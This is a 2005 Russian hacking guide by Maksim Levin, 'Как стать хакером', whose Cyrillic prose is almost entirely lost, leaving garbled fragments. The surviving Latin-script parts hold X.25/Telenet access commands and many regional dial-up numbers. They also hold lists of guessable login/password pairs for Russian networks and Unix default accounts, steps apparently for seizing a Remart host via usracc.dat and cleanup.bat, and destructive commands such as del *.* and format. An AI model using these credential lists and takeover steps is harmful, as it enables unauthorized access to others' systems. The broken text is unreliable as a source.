Максим Левин Как стать хакером

,

2005

004.056 32.973.202

36

.

36 : / . - 3- . - .: , 2005. - 320 .

ISBN 5-9643-0049-9 -

. 2000 . -. ,

, ,

, - .

-

. , ,

.

.

, ,

, .

,

, .

,

, U N I X ftpd ftp, , , ,

Internet, DNS- Internet .

, ,

, ,

,

.

Windows NT, Linux Unix .

, .

, , , , , .

-

,

. ,

.

, ,

. ,

-,

,

.

004.056 32.973.202

., 2005 -, 2005

ISBN 5-9643-0049-9 , 2005

... 3

,

- . :

, . -

.

, .

, - , ,

,

,

(cracker) . .

,

. .

.

... , ,

. - , .

! , , ; . , - . - .

; , .

,

...

4 ...

...

, 2 , .

, , .

: , .

: , , , -.

: , , , -, ,

, .

, ,

, : , .

, : ,

, , .

, , .

, : , Windows , c .

: , , . ,

, , ; .

.

. : : ?

: , Windows , c .

: , !

, Windows, , . ,

, ,

... 5

; , , .

,

: ? : , . :

? ? : , , , ,

.

: ? : .

: , ,

,

: ,

.

: ,

,

, .

: , ,

; ; ; . ,

.

General protection fault.

6

1. ?

,

, .

, ,

.

, ,

,

-

ARPAnet. . Internet. Unix , . Usenet. World Wide Web. ,

, , , - .

-. ,

, . ,

.

,

, ,

.

, ,

.

,

, . ( , , ), .

.

, .

, ,

7

,

.

,

,

.

: , .

, .

, - alt.2600 ,

, , .

- ,

, ,

.

- ,

,

.

, , ,

.

.

, 9 10 , -

,

( exploit). ( 10% ).

- ,

. , -,

, , ,

( ). ,

-

.

8

,

. ,

,

, : , .

- ( , ) , , . -

. , -,

: rm -f-d *, del *.*, format : /U .., , -, .

, -

.

, (

). ,

, ,

, , .

- (, , ), - ,

,

.

( ). Internet ,

Web-, . -

(, , ..). , , , -

.

- ,

,

- ,

9

. ,

, ,

: ,

. ,

,

.

, ,

,

. , ,

, . , , -

, .

, , , . ,

, ,

, ,

.

,

, -

,

.

-

, ,

,

: , (registration key) - ..

, ,

. ,

, . ,

,

- - .

- !

. ,

-

,

! , - , -

10

. ,

-, ,

. , .

,

,

.

,

, ,

. . ,

, ,

.. . . .

, ,

.

!

32- ,

, 70- , . .

,

. .

,

-.

; .

,

. , ,

, .

-,

.

( ) $10 . , .

, ,

, . , ,

. ; -

11

, -

, , ! 8 ,

. ,

,

.

, ,

,

.

,

. ? , ! , ,

. , ,

,

. , ,

?!

, ,

. 90- , , ,

( ) !

.

,

. ,

, ,

, .

( !). , , -

.

; , , , !

. . .

,

70- . ,

.

12

2.

,

. ,

, ,

. , ,

, .

, .

, , - ,

.

, -

, ,

.

,

, :

,

.

- ,

, .

. -

,

, .

, ,

, ,

.

,

, , .

,

, , .

-

. , , ,

, ,

, ,

- , .

.

13

- .

,

.

, ,

- , ,

.

, ,

,

.

,

, , , -

.

, ,

.

, ,

, , , .

- .

( ) ,

, ,

, , - .

. -

, .

, ,

,

, , ( ).

,

,

.

,

. ,

.

- .

-. ,

,

, . ,

, -

, .

14

, ,

.

, .

, .

- ,

, ,

. , -

.

.

, , .

, ,

, ,

.

.

.

, ,

. , ,

, -

-. , , ,

, .

, .

, ,

,

. ,

. -

, ,

.

,

, .

, .

, .

3.

- , -

. , -

15

, ,

.

,

. ,

, , ,

HTML. :

.

, , .

,

Python. , . ,

, . ,

.

,

( ), .

, .

, ,

,

, . ,

.

,

, Unix ( , ). - Perl LISP. Perl : web- , Perl, . LISP , , .

,

LISP.

, , (Python, , Perl, LISP). , , ,

.

16

, , - .

, (, , - ). , .

-

. -

- , ; , ; , ... ,

.

,

,

.

: , ( ) . ...

Unix , .

,

. ,

, - Linux BSD-Unix, .

, , Unix. -

. ,

DOS, Windows MacOS - , .

, Unix - Internet. Internet Unix, Internet-, Unix. Unix-. ( , , Unix Internet , Microsoft , .)

Unix, Linux, ( -, Linux, DOS/

17

Windows ). . . . Internet. . .

( , Lisp Perl), Microsoft . , ,

,

-.

World Wide Web HTML.

, ,

, ,

- --

. WWW - , - , .

( ) Web.

,

( ), HTML, Web. , HTML , - .

.

, . Web - . - ,

. , ,

.

, -

. / .

4.

, -

. ,

, - ,

( ) .

18

, ,

,

( , ). -, ( , ), , -

.

, - ,

. ,

, , , ,

, . ,

. , ,

.

, ,

:

.

( ) - , ,

.

-

(free software), , ,

-.

, open-source software.

- ,

,

, ,

.

.

,

.

.

, - (, , ,

19

) .

.

,

, , -.

,

.

, .

.

-

Web- (FAQ, ) .

,

.

.

( Internet, ) . , , ,

: , ,

, RFC .

, , ,

,

, .

.

.

, (, ). ,

.

,

, , .

,

.

20

: ,

. ,

, ,

,

.

5.

, ,

. , , ,

.

,

.

-

.

,

- , . .

-.

, ,

.

,

, , . ,

. - , ,

.

6.

, ,

. , ,

. ( ), , , -

.

21

.

( --).

- / . ( , , ).

.

.

- .

.

. (, .)

,

, .

- ,

,

( ,

). , , , .

.

Usenet ( - ).

-

, .

,

.

, ,

, - . ,

, .

7.

.

22

.

60- , , . , ,

,

.

.

...

. -,

, Analog, Scientific American Smithsonian, - .

,

,

.

, ,

, .

- - ,

. ,

. - -

.

, .

-

,

,

. , ,

,

.

, ,

.

-

.

.

, ,,

, .

,

,

.

23

,

,

,

. , ,

, , .

,

,

,

.

...

16 22 , ,

. , ,

,

, .

: - , , , ,

,

- .

- , ,

.

- .

, - ,

,

, , .

shareware freeware, PGP (Pretty Good Privacy) - , SATAN ( ) - , ,

-

, .

Internet - .

, ,

.

, , -

24

,

, ,

, .

,

.

,

. ,

70- .

.

- ,

,

. ,

-1.

, , ,

, .

. 80-

, IBM. , (Electronic Frontier Foundation), - - Lotus 1-2-3,

.

, ,

, Internet - 50 . , Internet, , , - ..

,

- .

25

BBS (Bulletin Board System - ), USENET, 80- ( User's Network - ) - .

: . USENET - ,

,

.

.

-

Internet, .

8. ?

.

. ,

, , .

. ,

.

.

.

.

Internet. . .

Internet.

. ,

-

-

, , ,

Web- .

, HackZone - . ,

,

,

.

26

,

,

. - : -,

Windows NT, , Pepsi-Cola... , , .

-

.

. ,

.

- xpress.ru , D2MAC. D2MAC - , - .

,

, -...

, -

, -

Internet, , . ,

Internete, ! , D2MAC , ,

, .

Windows NT , , , ,

. NT Security, ,

Windows NT - ,

. ,

, ,

Windows NT ,

, NT Security , .

Windows NT -

, .

27

: , ,

-,

,

. ,

, ,

- ,

.

Happy Hackers Guide - - .

Internet ,

.

,

,

.

, ,

: Internet-, , .

,

.

hacked.net ,

. : , ,

.

.

- , , 2600.. , ,

,

.

10 , - 1984 ( , , ). 1987 1995-. .

, , ,

-

.

-

.

28

-

-, , .

,

-

,

!

LOpht ( ) Heavy Industries - , ,

2600. - LOpht Crack 2.0, , Windows NT.

,

,

, Mondo 2000. , -

. ,

- , - -

. , , ,

: ,

LOpht . , -

.

Nomad Mobile Research Centre - -

: Windows NT, , , .

,

Novell. Compute .

? -,

, .

,

Internet , -

. ,

, .

,

, , , - .

29

9. -

,

, .

, , ,

, .

.

,

. ,

.

, ,

.

(

, ,

). ,

.

,

; , ,

!

,

,

-.

, ( ) , .

; . , . ,

, .

, ,

,

30

, , , .

.

,

.

,

-Z -S. Internet, .

Internet , . , , -

,

.

, . ...

!

Internet Intranet 31

Internet Intranet

1. ,

Internet - , ,

: . Internet TCP/IP, :

IP (Internet Protocol) - ,

;

UDP (User Datagram Protocol) - ,

IP ;

TCP (Transmissing Control Protocol) - ,

IP .

, Internet, IP-.

Internet- : . ,

; (routing). . , IP- ( ), , 194.85.31.20.

2. (DNS)

DNS (Domain Name System) - ,, ,

Internet. ,

32 Internet Intranet

, IP- . ,

. ,

- IP- .

DNS , , .

, ( ). .

, , , :

.gov - ;

.mil - ; - ;

.net - ;

.org - ;

.edu - . ,

, ISO. : www.spm.ru - ;

www.berlin.de - ; www.hotex.nl - .

3. Internet

Internet ., :

ping - .

traceroute - ( Windows 95 Windows NT - tracert.exe).

nslookup - DNS-.


telnet - (23 ) .

ftp - FTP (File Transfer Protocol) (21 ).

finger - , - .

WWW (World Wide Web) Netscape Navigator, Internet Explorer . (80 ) HTTP.

: ftp, telnet, finger www , , ,

-.

4. Internet

, ,

.

, ,

Internet, , . , .

Internet . :

- ( , ) Internet, ( ) .

Internet, - ,

.

(?! Internet?! WWW-cepeepa ?! ?! ! Internet!)

2-2588


- ,

, Internet.

,

.

- .

,

Internet, .

:

, ,

, .

- :

Internet ( ). ,

,

, .. ,

Internet.

,

Internet , ,

.25 ( SPRINT).

5.

.25 (), . ,

, .. ,

, .

,

-.

, . -

.Internet Intranet 35

(),

.

INUA (Network Users Address/ ) , .

INUI (Network User Identiflcator/

) .

.

DNIC (Data Network Identification Code/ ) 4 ,

.

PAD (Packet Assemble Disassembler// ) ,

, ..

, .

.25 .25 (

Telemate Telix). , ,

,

.

,

, .

,

. ,

, .. _


. , ,

-

,

.

: . ,

. ,

.

.

, -

, CTRL-P. :

CON - .25; LOC - ; CLR - ; PAR? - .; SET - .; SET? - .

;

PROF - .;

INT - ;

RESET - ; STATUS - .

:

- ;

ERR - ;

RESET - ; FREE - STATUS

;


ENGAGED - STATUS ;

CLRCONF - ;

CLR - :

DTE DTE ;

1 ;

3 INV - ;

5 NC - ; 9 DER - ; 11 NS - ; 13 NP - ;

17 RPE - ;

19 ERR - ; 21 PAD - ;

25 NRC - ; 33 INC - ;

41 NFC - ;

128 DTE - ;

129 DTE - DTE ; 130 DTE - ; 131 DTE - DTE .28;

132 DTE - DTE ; 133 DTE - DTE ;

134 DTE - ; 135 DTE - ; 136 DTE - .25; 137 DTE - DTE ;

138 DTE - .

38

1.

-

.

, .

. ? . ,

, .

,

, .

.

!

2.

,

. , , .

, ,

.

, .

, ,

, , -

, ,

- .

,

.

,

.

, :

1. , , .

2. .,

39

FDM, , !

3. , :

) ; ) ; )

MA BELL.

! - ,

. , ,

.

,

, ,

( ). , (.. ) .

4. .

5. - , , .

, , ,

, ,

, .

3.

. ,

.

,

, .

, .

, ,

- .

.

40

,

90VnpH20-30Hz

30-50V

600V. ! MOV. .

. ,

, ,

, , .

4.

.

. ,

33 , .

,

. , ,

, .

, , ,

... -

. ,

! - ,

.

5. FI

,

, - .

.

.

RFI ,

41

.

,

. , , ,

!

6. ESS

- Electronic Standardized Switching ( ESS), . ? ,

. ! - . , , ,

.

55 . , ! , -

. ! ESS . ,

, . , , ESS , .

! !

42

1. !

,

, .

, ,

: , ,

, .

,

.

,

.

2.

, . 50- (MIT) .

. , ,

. -

,

. ,

, ,

,

.

.

43

,

( , ..)

,

( ,

ID , ) ,

.

.

, ,

,

,

.

-

.

: , ,

, .

3.

-

Telenet. ? -, , . -,

. -,

Telenet, . ,

. - ,

, ,

.

, ,

.

Telenet , , , Telenet Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET .

44

, , -

. , :

=

- type . vt100 , . ,

-.

@. :

@ mail . phones

. ,

phones. , - . , dialup. local dialup,

=

@. , Telenet PAD. PAD / ( ), Public Access Device ( ). .

Telenet , , PAD, , 128 (, ) 9600 19 200 PAD, ,

. PAD , ,

. .

PAD , .

PAD? , ,

(NUA) , .

,

refused collect connections , ,

@ prompt.

45

, - Refused Collect. - ID (NUI). N U I - /pw , Telenet.

,

PAD - Netlink . Telenet N U A ( ) , ( 713 , .) , , , - ( 914), :

@> 914 001

,

914 002. , - .

.

(914 2354), (422 121 = 422 121.01). , , .

. , 512 , 512 00000.00 512 00000.99, 1 512 00001.00 512 00001.99. !

, .

.

, ,

@ prompt

D .

Outdials , N U A

.

- outdial. Outdial - , telenet - PC, , .

46

,

Hayes 1200 outdial, Detroit, MI

VEN-TEL 212 Modem ,

Session 1234 established on Modem 5588 ,

H Help - , .

-

- , outdial diverter, . .

, outdial, - , . ,

, - (Redial last number). , . ,

. - -

. VENTEL- D, , .

, , X. 25 Communication PAD, , @. PAD, , , , ,

PAD, , .

PAD PAD, , . ,

Telenet, 212 44 Connected

212. , 44 PAD 212 . 21244 .

PAD, , , .

.

47

4.

, ,

. ,

, : ?

, ,

- .

,

, ,

.

VMS VAX- Digital Equipment Corporation (DEC)

VMS ( ) . VMS : USENAME

,

,

.

.

- ,

,

. VAX . HELP .

DEC-10 DEC-10 - DEC,

TOPS-10 . ..

DEC-10/20 , - .

[, ], - .

.systat ( ).

48

[234,1001] BOB JONES, JONES . , :

. l o g i n x x x , y y y , , .

.

, UIC, (UIC = ) .

UNIX ,

UNIX.

,

, .

UNIX l o g i n : . UNIX

( ), , .

Prime Prime, ,

Primos. Primecon 18.23.05 - ,

. . ,

,

login

18.00.00 Primos, ^ . , 19 +. Primos . Prime Telenet - NETLINK. - , NETLINK, . N U A ' , nc.

, NUA 026245890040004,

49

@nc:26245890040004 netlink.

-

Hewlett-Packard. :. HEWLETT-PACKARD - :

HELLO SESSION NAME, USERNAME, ACC0UNTNAME, GROUP

,

. -

, - ,

,

. , ,

, .

- ,

:, , .

IRIS IRIS Interactive Real Time Information System (

). PDP-1 l'S, - -.

Welcome to IRIS R9.1.4 Timesharing

ACCOUNT ID? Iris

.

VM/CMS VM/CMS - , IBM (Interna

tional Business Machines). , ,

VM/370 ONLINE ., Tops-10. ,

:

LOGON .

50

NOS NOS Networking operation system

Cyber, Control Data Corporation. NOS ,

WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978,1987

, ,

FAMILY:

return. user name:

- 7 - . , 7-DOC.

Decserver , , , ,

, ..

Decserver : Enter Username>

. - .

, - .

Local>

.

sh servises

sh nodes - ,

help. modem, dial, - , !

GS/1 GS/1 - . Decserver,

, GS/1 . :

51

GS/1 > .

GS/1, :

( , , , ..), , GS/1. , Decserver, :

< systemname > , , :

sh n

sh - ,

. ,

, .

5.

. -

: ,

.

, .

() .

ToneLoc v1.10 . - -

. , ,

, ?

Cracker Jack v1.4 . ,

.

52

Hacker's Utility V1.02 .

:

port scanner

finger lookup file extractor !

CyberKit v. 2.4 :

Trace Route

WhoIs Finger

Name Server Look Up Time Synchronizer

Quote of the Day . PGP Freeware v5.0

.

? ? , ! , . , ,

!

7th Sphere PortScan v1.1 7th Sphere.

.

:

1. , . . -

, - , .

,

, .

!

2. , , - (C++, Perl, JavaScript ).

53

Unix, TCP/IP . , ...

6 ( ).

1. , ( ), . ,

.

, ,

, ; , . ,

,

. , ,

, , .., , ,

, , .

2. 20:00 ( !) 00:00 . , , . ! , , . 00:00 , , 00:00 .

- . ,

( 00:00-03:00). - ,

, , -

.

3. , - , ( ) /, , ,

. , , /r, , . -

...

4. , - ..

GO ADMINi

54

, , -

( ). .

5. ,

. .

6. , - , n' ( -) . - / , .

7. -, , - ( ). / ?.

-

. ,

, -

. .

.

. . ,

, , ? , ,

,

.

, , -

.

,

. , ,

.

,

.

55

Display ANSI graphics ([Y]/N)? > [...- ( ). . . ] UserlD : Password:

ENTER YOUR NAME = > PASSWORD = > LANGUAGE = >

REX400 Logical Channel: 0 REX400 v 4 . 5 4 . 0 2 , Copyright (C) 1992-1996, Club400 Ltd.

M) Mail H) Help G) Gateway Q) Quit Hult i Host>

CISCO- User Access Verification Password: ,

, :

(UserlD/Password): Demo/Demo Test/Test Guest/Guest Gast/Gast Gost/Gost User/User Demo/Guest Test/Guest Guest/Test Gast/Demo Gost/Demo User/Demo Demo/Test Test/Demo Guest/Demo Gast/Guest Gost/Guest User/Guest Demo/Gast Test/Gast Guest/Gast Gast/Test Gost/Test User/Test Demo/Gost Test/Gost Guest/Gost Gast/Gost Gost/Gast User/Gast Demo/User Test/User Guest/User Gast/User Gost/User User/Gost Demo/New Test/New Guest/New Gast/New Gost/New User/New Demo/Temp Test/Temp Guest/Temp Gast/Temp Gost/Temp User/Temp New/New Temp/Temp New/Demo Temp/Demo New/Guest Temp/Guest New/Test Temp/Test New/Gast Temp/Gast New/Gost Temp/Gost New/Temp Temp/New New/User Temp/User ,

, :

56

Demo1/Demo1 ..,

. .

( ) .

- , :

UUCP/UUCP ,

.

UUCP/PCUU , .

UUCP/UUAOMIN

, .

, , , - .

, :

Alex/Alex Luda/Luda Boris/Boris Ludmila/Ludmila Yura/Yura Dasha/Dasha Alexey/Alexey Olga/Olga Boria/Boria Alexandr/Alexandr Egor/Egor Katia/Katia Alexander/Alexander Igor/Igor Anna/Anna Dima/Dima Vladimir/Vladimir John/John Dmitry/Dmitry Vova/Vova Nik/Nik Dmitriy/Dmitriy Vladymir/Vladymir Kolia/Kolia Diman/Diman Dimon/Dimon Toma/Toma Eugene/Eugene Vlad/Vlad Sergey/Sergey Elena/Elena Den/Den Serg/Serg Segre/Serge Victor/Victor Gera/Gera Gosha/Gosha Nikolay/Nikolay Tonya/Tonya Gesha/Gesha Denis/Denis Viktor/Viktor Helen/Helen Sasha/Sasha Leonid/Leonid Ira/Ira Greg/Greg Marina/Marina Iren/Iren Misha/Misha Andre/Andre I r i n a / I r i n a Stas/Stas Andy/Andy Lena/Lena Gena/Gena Andrey/Andrey Lio/Lio Yuri/Yuri Oleg/Oleg Lion/Lion Yury/Yury K i r i l / K i r i l Leo/Leo Yuriy/Yuriy Eugeny/Eugeny Max/Max Anton/Anton Eugeniy/Eugeniy Maxim/Maxim Peter/Peter Evgeniy/Evgeniy Petr/Petr Svetlana/Svetlana A r t u r / A r t u r

5 7

Slava/Slava Ivan/Ivan Yaroslav/Yaroslav Mih/Mih Valera/Valera Yar/Yar Valery/Valery Valeriy/Valeriy Tomara/Tomara ..

, -

. - .

ID ,

.

. , -

.

.

, :

reg

registry

onboardl onboard - .

, MAIN (GO MAIN TREE, TYPE LIB TYPE LIBS TYPE LIB-TREE.

1 - .

, 6100255 , ,

,

, .

, ID . , ,

, ,

ID. , ID . ID , , / /, 10-15 ID. (/ ). . -

.

58

,

- .

:

1 - ( ). 2 - ( ). 3 - (

.

, ,

, .

.

,

:

,

.

.

.

8 .

.

, .

, ,

, .

( Demo Demo). , Demo/Demo, .

( - ): ! , ,

,

.

206-85-70 924-74-85

59

ID Password. ( ). !

, , -

.

.

, ( ) ID , ID. .

:

/ / / / Ukrpack / / (0482) 33-31-78/ /. :

Ukrpack/Ukrpack

Ukrpack/Kcaprku -

Ukrpack/ Andrew -

Ukrpack/Andy-

Ukrpack/Andrey- Ukrpack/Fylhtq - (

) ' Ukrpack/Kfpfhtd - (

) Ukrpack/Vbffqkjdbx- (

) Ukrpack/Lam -

Ukrpack/Aml -

Ukrpack/Mal -

Ukrpack/Lma -

Ukrpack/333178 -

Ukrpack/Telnet -

60

Ukrpack/Ntkytn - ( )

Ukrpack/Odessa - (, )

Ukrpack/Jltccf- ( )

, -

- .

-

,

.

() . ,

:

X = S

X - , S - , , - . ,

,

, ( ). , ,

( qwerty secret), -, - ( ) . : - . /U

:

.

.

Capture. :

/ /

/ , - -

ID , '.

61

.

< / ? / ?.

. ,

.

:

- , ..

,

, , .

!

- , -

.

. ,

, - - .

N (.. ') . , N , . ,

, , ,

Z ( --).

:

, , .. ,

...

USRACC.DAT ,

dat\usracc.dat , , , ,

.

, (, , ) , , . ,

30 000 (, ).

usracc.dat, .

62

1 usracc.dat,

( usracc.dat ).

,

useracc.dat . ( !) , . 6100255 .

2 ,

. ? , ?; ml, . :

1. , : , , :

ml /d /d , dos-.

:

:\> cd dir

( \remart \remart.40, ).

,

()

, d:, .

.

i: ,

, d, e, f, g, h, i, ...

2. , usracc.dat dat. He type - - , - ,

.

63

3. remart.bat . ,

.

, .

pause - , , ,

pause, , .

remart.bat cleanup.bat, .

remart.bat . cleanup.bat - !

remart.bat - DOS batch file missing, .

4. cleanup.bat type cleanup.bat .

del cleanup.bat -

type cleanup.bat , ; ( )

:

C:\REMART.40\DAT\USRACC.DAT :\ remart.40 ,

,

.

5. . , , , .

hangup, , ,

-

, .

, ( ), cleanup .

64

6. , remart.bat , cleanup.bat ( ) .

, .

( ). 7. . ,

usracc.dat, , del ( !..) . cleanup.bat.

8. rl _ 9. -...

,

.

,

(!) . admin/admin, , ,

adminoM. .

:

1 - . : Display ANSI

Graphics ([Y]/N)? >, @. . :

Login: Password: ,

Enter. (10-20 .) . , ,

.

@ - . , (5-6 .).

2 - .

. / ( ) -

65

, Enter ! ,

( ). . ,

, .

- .

3 - . ,

.

(, dir). . 4

- .

. - : /

6 6

,

:

/off , :

...

, , 6100255 .

, , Enter - , ( , ) . - /, / ..

,

, go chattop, - () / 1. -

,

, / 1, , . ,

, /, F+++ - , .

:

1. PROTECT ( ) - , , -

.

2. , SQRT ( Security), , , Alt+251 (v), . Demo - , . ? v , : SQRT ( , , Eclipse protection mode - 80286 -

67

). - - remstart.com , RE-MARTL.EXE , , .

: (8182) 43-36-71 43-31-21 47-37-00 49-31-21 47-36-23

: (81842) 4-36-80

: (3852) 26-16-71 22-54-41 24-33-01 23-67-40 24-29-74

: (38542) 4-87-40 4-36-54 4-87-41

: (38541) 31-205 43-411

: (38557) 2-42-73 2-35-23 2-32-06

68

: (38568) 2-10-99

: (38511) 2-02-16

2-20-06

2-00-17

: (07222) 70-232

: (4162) 44-22-56 44-22-10

44-88-70

44-22-38

44-22-47

: (08322) 69-106

69-107

: (4232) 26-12-10

22-42-43

: (42366) 4-43-13

4-72-06

: (42341) 2-06-01

2-57-51

: (86722) 49-075 69-601

69

: (8442) 32-77-90

32-54-94 36-14-40

36-43-54 36-42-31

: (84459) 7-50-77

3-75-34

: (0732) 56-19-46

55-54-67

56-19-47

56-04-35

56-19-48

56-19-49

: (07396) 28-486

: (3432) 44-98-81

.51-10-87

49-57-75

51-22-93

44-98-89

: (34370) 4-46-07

4-31-04

4-46-08

4-46-09

70

: (3412) 25-91-94

25-40-35

65-76-32

25-96-13

65-76-10

25-40-06

: (8432) 38-45-73 38-53-98 38-47-84

36-23-52 38-48-95 36-53-98. 38-47-74

38-47-07

: (84312) 9-24-39

3-16-13

9-63-45 9-63-45: 9-64-68

9-62-86

9-64-69

.3-16-13

3-34-22

: (84371) 2-27-18

2-17-52

71

.5-33-55

5-36-26

: (84357) 3-17-46

3-26-99' 3-17-60' 3-21-30

. : (8439) 58-82-15 58-82-08 58-82-17 58-57-03 58-82-35. 58-82-37

: (84342) 2-11-26

2-42-35

: (08422) 4-83-28

4-20-16

: (08456) 2-22-11

: (08442) 2-11-66

: (08431) 4-25-11

: (08439) 4-08-20

3-25-50

7 2

--: (42172) 3-00-60

3-68-38

3-41-75 3-58-57

: (86537) 2-36-55

5-94-65

2-36-50

2-35-91

: (86534) 5-46-21

7-32-26

7-59-02

: (86531) 4-13-98

3-09-58

3-61-71

4-18-91 : (86533)

5-94-11

4-13-31.

4-13-30 : (8612)

59-05-78 59-11-22 59-05-79 59-06-04 59-05-80

73

: (3912) 29-50-81 66-11-22 66-14-50

: (0712) 56-73-47 56-07-56 56-73-48 56-73-53 56-73-55 56-73-57 56-73-58 56-73-50

: (0742) 72-20-49 72-07-92 72-25-95

: (095) 975-84-03 924-74-85. 921-21-03 924-85-69 442-70-88 206-83-41 442-82-77 925-26-29 442-83-88 442-64-77 442-85-77

74

442-70-22

442-80-77

925-82-50 442-64-22

913-35-71

: (095) 229-61-04

229-77-69

: (226) 71-699

: (272) 62-551

: (264) 43-406

: (8152) 23-19-53

33-22-39 33-22-67

86622 2-72-49' 2-66-11

: (3832) 23-55-38 10-11-62

23-55-01 23-46-72

23-55-10 23-55-47

75

: (81600) 7-32-24

7-62-94

: (08622) 5-30-65 5-89-57 5-30-01 5-30-83

: (3532) 72-29-30

72-70-35 72-29-31

41-89-98

: (3422) 90-03-30

90-03-16

--: (8632) 69-69-81

64-57-66 64-45-50 66-25-82

: (0912) 93-03-01 77-55-73

-: (812) 325-16-26

311-08-01

277-08-19

7 6

: (8342) 17-94-11

17-60-70

: (8622) 99-97-10

99-97-99 92-22-82

: (8652) 35-79-06 35-68-65 35-41-42 35-75-05 35-74-18 35-15-79 35-67-24

: (08222) 55-02-52 33-05-28

: (3452) 26-21-09 26-23-45 26-21-00 26-18-00 24-48-31

: (34595) 33-186 .32-051

31-889

77

-: (30122) 6-29-29 6-62-33 6-27-27

: (3472) 52-62-10 52-62-20 37-73-40

: (4212) 21-81-47

33-29-99 38-62-76

: (3512) 38-07-15 60-56-63 38-07-16 38-07-17

78 Unix

Unix

1.

UNIX, , AT&T - 60- . , UNIX, , , , , , UNIX . ,

. , ,

, .

, - IBM , ? , UNIX . , ,

UNIX ( UNIX, , ). AT&T UNIX, - (AT&T 6300). Sun SunOS, UNIX, VAX- Ultrix, VAX- UNIX. : , (BSD, UNIX, SunOS, Ultrix, Xenix ..), , .

, , ,

. -

, UNIX ,, , , , ,

. , ,

UNIX VAX , - IBM-. , , ,

, VAX, VMS.

2. Unix

UNIX UNIX, - UNIX, , , ( Unix System V

Unix 79

BSD, SunOS, Ultrix, Xenix ..), .

, unix . , UNIX , , :

Login:

. , , , Unix, BBS, login- OS ( ) , Unix. (Xa!) Unix'bi Login: :

Welcome to SHUnix. Please log in.

( SHUNIX. ) Login:

- . Unix'bi (, BBS ) , , - . , Unix'ax , ,

UUCP/USENET/BITNET .

. (login)! (account). 8 . , ,

. ,

UNIX . , : .

.

:

ACCOUNT root sys biu mountfsys adm uucp nuucp anou

root - ( ) sys / system / bin sys / bin mountfsys adm uucp anon

anon

80 Unix

user

games install reboot demo umountfsys sync admiu guest daemou

user games install * ni. ie?a demo umountfsys sync admin guest daemon

root, mountfsys, umountfsys, install , , sync - . ,

.

, ,

/, . REBOOT , , -

. , ,

, - . ,

, UNISYS, HP/UX (Hewlett Packard Unixes). , .

, ,

(reboot), , .

BSD MIT ( ). :

rwho - ,

finger - w h o -

,

.

/ , , . login incorrect.

Unix 81

, ,

, ,

.

, . ,

, ,

.

- Cannot change to home directory Cannot Change Directory. home directory, , , . :\ :\, -, - /homedirectory. (: / ( ), \ ( )). , ,

['/']. No Shell. ,

shell, . .

, ,

() , Using the bourne shell Using sh.

.

,

.

, , : .

.

.

. .

UID ( ) . UID 0 ().

UID = 0 . (), . , DID = 50, - UID 50, , , .

82 Unix

4.

- ,

,

. ,

passwd. . . ,

, - ( ). - , -MAND.COM MS DOS, ( ). , ,

. , :

sh - , COMMAND.COM Unix. , Unix.

csh - , - .

ksh - korn. .

tcsh - , MIT. .

vsh - , . ... Windows DOS. rsh - restricted () remote () .

, ,

, Unix Unix, . , , ,

, .

Eskimo North, Unix . Esh, BBS, , , .

, -

.

Unix 83

, BBS.

,

:

$ ,

:

#

PS1 . , PS1 HI:, :

HI:

5.

Control-D .

, .

control-d, , .

Control-J .

@ .,

? wildcard (). .

, , b?b, Unix bob, bib, bub, / a-z, 0-9.

. *,

hit, him, hiiii, hiya , hi. H*l hill, hull, hi , h 1.

84 Unix

. b[o,u,i]b, : bib, bub, bob. b[a-d]b, : bab, bbb, bcb, bdb. [], ? *

.

Unix . , Hill hill - . , Hill, hill, hill, hili . , [], , . ..

6.

Unix. ,

.

IS .

, ,

Is .

:

$ is hithere runme note.text src

$ -I : $ is -1 rwx--x--x sirhack sirh 10990 runme ...

:

rwx-x-x - .

sirhack sirh - , , sirhack = , sirh = , .

Unix 85

10990 - . runme - .

cat . .

. :

$ cat note.txt !

$ cd (). : cd

/dir/dirl/dir2/dirn. did/... - . , :

$ cd / ., *

$ Is bin sys etc temp work us , , , -

$ cd /usr $ Is sirhack datawiz prophet:

violence par phiber scythian $ cd /usr/sirhack $ Is hithere runme

note.text src

$

86 Unix

, .

(), (, src), cd src [ /]. cd /usr/sirhack/src sirhack dir cd src.

.

: _ _

$ runme runme2 $ Is hithere runme note.text src runme2 , .

$ runme /usr/datwiz/runme

mv

.

: mv _ _

$ mv runme2 runit $ Is hithere runme note.text src runit :

$ mv runit /usr/datwiz/run $ Is hithere runme note.text src $ Is /usr/datwiz runme run

Unix 87

pwd

$ pwd /usr/sirhack $ cd src $ pwd /usr/sirhack/src $ cd .. $ pwd /usr/sirhack (.... ) $ cd . . /datwiz ( cd/usr/datwiz) $ pwd /usr/datwiz $ cd $home ( home) $ pwd /usr/sirhack

rm .

: _ rm - _

$ rm note.text $ Is hithere runme src $ write . ,

.

: write _* $ write scythian scythian has been notified (scythian ) Scy! ?? Message from scythian on tty001 at 17:32 ! : ? scy: .

88 Unix

: .

scy: ok : c o n t r o l - D [ ] $ who (w, who, whodo) , :

$ who login term logontirae scythian + tty001 17:20 phiberO + tty002 15:50 sirhack + ttyOOS 17:21 datawiz - tty004 11:20 glitch - tty666 66:60 $ who . + ,

write , - - .

man .

: man _. . , who, :

$ man who WH0O) xxx .

stty . man stty,

stty, , . : $ stty -parenb ,8,1. Unixno

,7,1.

sz, rz / zmodem.

, S X / xmodem.

Unix 89

rb, sb / batch () ymodem.. 6 Unix , .,

umodem / send/receive via umodem. $ sz filename ready to s e n d . . . ( ... ) $ rz filename please send your f i l e . . . (, . . . ) . . .e tc . . ( ..)

ed .

: ed_.

ed _ $ ed newtext

*

1 2 [control-z] * 1 [ 1] 1 * [ ] 3 [control-z] [ 0]

[control-z] 1,41

1 2 3 * w 71 * q $

90 Unix

:

*

*

71 - .

-

1 -

# -

w -

1 ftiame - fname

s fname - fname

w -

q -

mesg / (write)

( ). : mesg () mesg n ().

.

chmod . , .

: chmod mode filename (chmod _) $ chmod a+r newtext newtext:

- all () - read ().

chown .

: chown filename $ chown scythian newtext

Unix 91

chgrp .

: chgrp group file $ chgrp root runme $ finger .

: finger _

.

: grep file $ 1 newtext 1 $ newtext

$ " line 1" newtext $

mail . ,

. , , ELM, MUSH MSH, mail. :

mailusername@address

mail username

mail

mail addrl!addr2!addr3!user mail username@address -

- . UNIX, DOS- VAX- Unix Mail. mail user@address; , .

92 Unix

.

:

mail phibereoptik

:

mail sysl! unisys! pacbell! sbell! scKatt. com! sirhacksys! optik!phiber . .,

, ,

. ,

phiber. , : $ mail sys!uni S ys!pacbel l !sbel l !sc1!att .com!sirhacksys! optik!phiber . ? , . , ? (contrc-1-D) $ , 20

